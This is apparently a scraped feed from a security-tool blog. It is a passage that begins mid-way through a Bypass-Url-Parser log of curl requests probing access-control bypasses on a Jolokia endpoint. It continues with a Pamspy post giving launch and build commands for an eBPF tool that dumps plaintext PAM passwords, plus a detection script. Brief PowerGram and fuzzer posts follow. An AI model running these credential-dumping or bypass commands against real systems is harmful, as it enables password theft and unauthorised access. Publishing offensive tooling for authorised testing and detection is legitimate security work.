'\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: 
curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux 
x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'<br />[...]<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux 
x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: 
%{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'<br 
/>2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e.//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%09//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is 
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl - sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'<br />2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit<br />2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser<br />2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:<br /> 9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html<br /> 10: 97 - 219145da181c48fea603aab3097d8201.html<br /> 10: 99 - 309b8397d07f618ec07541c418979a84.html<br /> 10: 100 - 9a1304f66bfee2130b34258635d50171.html<br /> 10: 108 - b61052875693afa4b86d39321d4170b4.html<br /> 10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html<br /> 11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html<br /> 12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html<br /> 1 6: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html<br /> 21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html<br /> 22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html<br /> 22: 109 - 6d4b61258386f744a388d402a5f11d03.html<br /> 22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html<br /> 76: 821 - bfe5f92861f949e44b355ee22574194a.html<br />2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:<br />echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xa rgs bat<br /></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a 
class="kiploit-download" href="https://github.com/laluka/bypass-url-parser" rel="nofollow" target="_blank" title="Download Bypass-Url-Parser">Download Bypass-Url-Parser</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-44049287787944973242022-07-09T08:30:00.000-04:002022-07-09T08:30:00.259-04:00Pamspy - Credentials Dumper For Linux Using eBPF<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh630pwXroI0REuPFjnkP3e1xi4NBs92ScdIQ8WoIiyYGgfd2PjTMB-Gb4WKGasgXeSlrj_0V-7ALK55nPcGEE9F-up_HhV9zilOjx1xPSNWd-zP5kPyuYR51YHhClJGxdvR5TMwK0wWzG1Y6U77oZoM2nZyoEgvIfxAVK2RVsKV3hImD8IR8XT-SMd"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7117889920680691090" src="https://blogger.googleusercontent.com/img/a/AVvXsEh630pwXroI0REuPFjnkP3e1xi4NBs92ScdIQ8WoIiyYGgfd2PjTMB-Gb4WKGasgXeSlrj_0V-7ALK55nPcGEE9F-up_HhV9zilOjx1xPSNWd-zP5kPyuYR51YHhClJGxdvR5TMwK0wWzG1Y6U77oZoM2nZyoEgvIfxAVK2RVsKV3hImD8IR8XT-SMd=w640-h360" width="640" /></a></p><div><br /></div> <p dir="auto"><code>pamspy</code> leverages eBPF to do the equivalent of <a href="https://github.com/blendin/3snake" rel="nofollow" target="_blank" title="3snake">3snake</a>.</p> <p dir="auto">It hooks a single userland function inside the PAM (Pluggable <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="Authentication">Authentication</a> Modules) library, which many critical applications use to handle authentication, such as:</p> <ul dir="auto"> <li>sudo</li> <li>sshd</li> <li>passwd</li> <li>gnome</li> <li>x11</li> <li>and many others ...</li> </ul> <span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">How to launch?</h2> <p dir="auto"><code>pamspy</code> is built as a static binary without any dependencies, and is available on the <a 
href="https://github.com/citronneur/pamspy/releases/" rel="nofollow" target="_blank" title="release">release</a> page.</p> <div><pre><code>Usage: pamspy [OPTION...]<br />pamspy<br /><br />Uses eBPF to dump secrets use by PAM (Authentication) module<br />By hooking the pam_get_authtok function in libpam.so<br /><br />USAGE: ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /var/log/trace.0<br /><br /> -d, --daemon=PATH TO OUTPUT CREDENTIALS<br /> Start pamspy in daemon mode and output in the file<br /> passed as argument<br /> -p, --path=PATH Path to the libpam.so file<br /> -r, --print-headers Print headers of the program<br /> -v, --verbose Verbose mode<br /> -?, --help Give this help list<br /> --usage Give a short usage message<br /> -V, --version Print program version<br /> <br />Mandatory or optional arguments to long options are also mandatory or optional<br />for any corresponding short options.<br /><br />Report bugs to .<br /><br /></code></pre></div> <p dir="auto">As <code>pamspy</code> relies on libpam, you have to pass the path where libpam is installed on your distribution. 
To find where libpam is installed, run the following command:</p> <div><pre><code>> /usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4<br />/lib/x86_64-linux-gnu/libpam.so.0<br /></code></pre></div> <p dir="auto">Once you have the path you can launch <code>pamspy</code>:</p> <div><pre><code>> ./pamspy -p /lib/x86_64-linux-gnu/libpam.so.0<br /></code></pre></div> <p dir="auto">An easier way is to let the shell resolve the path for you:</p> <div><pre><code>> ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4)<br /></code></pre></div> <p dir="auto"><code>pamspy</code> can also be started as a daemon by providing an output file where credentials will be written:</p> <div><pre><code>./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /tmp/credentials<br /></code></pre></div> <p dir="auto">Loading an eBPF program and attaching a uprobe requires root (or the equivalent capabilities), so run these commands as root. If <code>ldconfig</code> lists more than one <code>libpam.so</code> entry (for example the development symlink next to <code>libpam.so.0</code>), the command substitution expands to several words; pass a single path explicitly in that case.</p> <h2 dir="auto">How to build?</h2> <p dir="auto">To build the static binary you need a few third-party programs. For eBPF you need <code>clang</code> to compile the C code into eBPF CO-RE bytecode, <code>bpftool</code> to generate a skeleton from the eBPF object so it can be embedded in the userland program, and <code>libelf</code> to find the correct symbol in libpam.</p> <div><pre><code>sudo apt install make clang-11 gcc libelf-dev bpftool<br /></code></pre></div> <p dir="auto">Then just build!</p> <div><pre><code>git clone https://github.com/citronneur/pamspy --recursive<br />cd pamspy/src<br />make<br /></code></pre></div> <h2 dir="auto">How does it work?</h2> <p dir="auto"><code>pamspy</code> loads an eBPF program attached as a userland return probe (uretprobe) on the <code>pam_get_authtok</code> function in <code>libpam.so</code>. 
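</p>
<p dir="auto">Because that probe is attached through the kernel's perf subsystem, the attachment is visible to anyone with root on the box: <code>bpftool perf list</code> prints one line per perf-event-attached program, naming the probed file and the byte offset inside it, with the pid of the process holding the event (pamspy itself while it runs). The following is an added example, not part of pamspy, that parses such a listing and flags probes planted in libpam. The sample lines are constructed to match the text format documented in bpftool-perf(8), the offset and the small symbol table that maps it to <code>pam_get_authtok</code> are assumptions, and on kernels where libbpf attaches through a bpf_link the same attachment shows up under <code>bpftool link show</code> instead, so a real check looks at both.</p>

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Matches the line format documented in bpftool-perf(8), for example:
#   pid 21800  fd 5: prog_id 9  uprobe  filename /home/yhs/a.out  offset 1159
PERF_LINE = re.compile(
    r"^pid (?P<pid>\d+)\s+fd (?P<fd>\d+): prog_id (?P<prog>\d+)\s+(?P<kind>\w+)\s*(?P<rest>.*)$"
)
UPROBE_REST = re.compile(r"filename (?P<path>\S+)\s+offset (?P<offset>\d+)")


@dataclass(frozen=True)
class UserProbe:
    pid: int          # process holding the perf event (the tracer, not the traced program)
    prog_id: int      # eBPF program id, usable with 'bpftool prog dump xlated id N'
    kind: str         # "uprobe" or "uretprobe"
    path: str         # file the probe is planted in
    offset: int       # byte offset of the probed instruction inside that file


def parse_perf_listing(lines: Iterable[str]) -> List[UserProbe]:
    """Return every uprobe/uretprobe attachment found in 'bpftool perf list' text output."""
    probes = []
    for line in lines:
        m = PERF_LINE.match(line.strip())
        if not m or m["kind"] not in ("uprobe", "uretprobe"):
            continue
        u = UPROBE_REST.search(m["rest"])
        if not u:
            continue
        probes.append(UserProbe(int(m["pid"]), int(m["prog"]), m["kind"], u["path"], int(u["offset"])))
    return probes


def find_pam_probes(lines: Iterable[str], symbols: Optional[Dict[int, str]] = None) -> List[str]:
    """Flag probes planted in libpam. 'symbols' maps file offsets to symbol names and is assumed
    to come from out of band (for example 'nm -D' on the library); without it the offset is shown."""
    findings = []
    for p in parse_perf_listing(lines):
        if not p.path.rsplit("/", 1)[-1].startswith("libpam"):
            continue
        name = (symbols or {}).get(p.offset, "offset %d" % p.offset)
        findings.append("pid %d prog %d: %s on %s (%s)" % (p.pid, p.prog_id, p.kind, name, p.path))
    return findings


# Constructed sample output (not captured from a real host): one pamspy-style uretprobe on
# libpam next to two unrelated attachments that must not be flagged.
SAMPLE_LISTING = """\
pid 4120  fd 5: prog_id 19  tracepoint  sched_switch
pid 4121  fd 6: prog_id 20  uprobe  filename /usr/lib/x86_64-linux-gnu/libc.so.6  offset 8589
pid 738125  fd 7: prog_id 312  uretprobe  filename /lib/x86_64-linux-gnu/libpam.so.0  offset 16672
""".splitlines()

# Assumed symbol table for the sample; the offset is made up for the example.
SAMPLE_SYMBOLS = {16672: "pam_get_authtok"}

if __name__ == "__main__":
    for finding in find_pam_probes(SAMPLE_LISTING, SAMPLE_SYMBOLS):
        print("[!]", finding)
```

<p dir="auto">On a live host, feed it the output of <code>bpftool perf list</code> (root required) and resolve the offset against the library's dynamic symbol table; bpftool's global <code>-j</code> flag gives JSON that is more robust to parse than the text format assumed here, which is used only so the example runs offline on constructed lines.</p>
<p dir="auto">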
PAM stands for "Pluggable Authentication Modules" and has a flexible design for managing different kinds of authentication on Linux.</p> <p dir="auto">Each time an application authenticates a user it calls <code>pam_get_authtok</code>, which hands the user's authentication token (typically the plaintext password) back to the calling module; the return probe fires at that moment, so <code>pamspy</code> reads the token before any module hashes or compares it, whatever the backend.</p> <p dir="auto">Easy! Enjoy!</p> <h2 dir="auto">Credits and references</h2> <p dir="auto">Thanks to @blendin for the 3snake tool!</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/citronneur/pamspy" rel="nofollow" target="_blank" title="Download Pamspy">Download Pamspy</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-56670650266448379172022-06-01T10:00:00.000-04:002022-06-01T10:00:02.122-04:00PowerGram - Multiplatform Telegram Bot In Pure PowerShell<p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7103840857639290338" src="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB=w640-h400" width="640" /></a></p><p align="center" dir="auto"><br /></p> <p dir="auto"><strong>PowerGram</strong> is a pure <a href="https://www.kitploit.com/search/label/PowerShell" target="_blank" title="PowerShell">PowerShell</a> <a href="https://www.kitploit.com/search/label/Telegram" target="_blank" title="Telegram">Telegram</a> Bot that can be run on Windows, <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> or Mac OS. 
To make use of it, you only need PowerShell 4 or higher and an internet connection.</p> <p dir="auto">All communication between the Bot and the Telegram servers is encrypted with HTTPS, but every request is sent as a GET, so the bot token and the message content travel in the URL itself; anything that records request URLs, such as an intercepting proxy or a server-side access log, ends up holding them.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Requirements</h1> <ul dir="auto"> <li>PowerShell 4.0 or greater</li> </ul> <h1 dir="auto">Download</h1> <p dir="auto">It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <div><pre><code>git clone https://github.com/JoelGMSec/PowerGram<br /></code></pre></div> <h1 dir="auto">Usage</h1> <div><pre><code>.\PowerGram -h<br /><br /> ____ ____ <br /> | _ \ __ __ __ __ _ __ / ___|_ __ __ _ _ __ ___ <br /> | |_) / _ \ \ /\ / / _ \ '__| | _| '__/ _' | '_ ' _ \ <br /> | __/ (_) \ V V / __/ | | |_| | | | (_| | | | | | | <br /> |_| \___/ \_/\_/ \___|_| \____|_| \__,_|_| |_| |_| <br /><br /> ------------------- by @JoelGMSec ------------------- <br /><br /> Info: PowerGram is a pure PowerShell Telegram Bot<br /> that can be run on Windows, Linux or Mac OS<br /><br /> Usage: PowerGram from PowerShell<br /> .\PowerGram.ps1 -h Show this help message<br /> .\PowerGram.ps1 -run Start PowerGram Bot<br /><br /> PowerGram from Telegram<br /> /getid Get your Chat ID from Bot<br /> /help Show all available commands<br /><br /> Warning: All commands will be sent using HTTPS GET requests<br /> You need your Chat ID & Bot Token to run PowerGram<br /><br /></code></pre></div> <h3 dir="auto">The detailed usage guide can be found at the following link:</h3> <p dir="auto"><a href="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell" rel="nofollow" target="_blank" title="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell">https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell</a></p> <h1 
dir="auto">License</h1> <p dir="auto">This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <h1 dir="auto">Credits and Acknowledgments</h1> <p dir="auto">This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec</p> <h1 dir="auto">Contact</h1> <p dir="auto">This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p dir="auto">For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/PowerGram" rel="nofollow" target="_blank" title="Download PowerGram">Download PowerGram</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-69100578008326166832022-05-23T17:30:00.007-04:002022-05-23T17:30:00.270-04:00Frelatage - The Python Fuzzer That The World Deserves<p align="center" dir="auto"><a 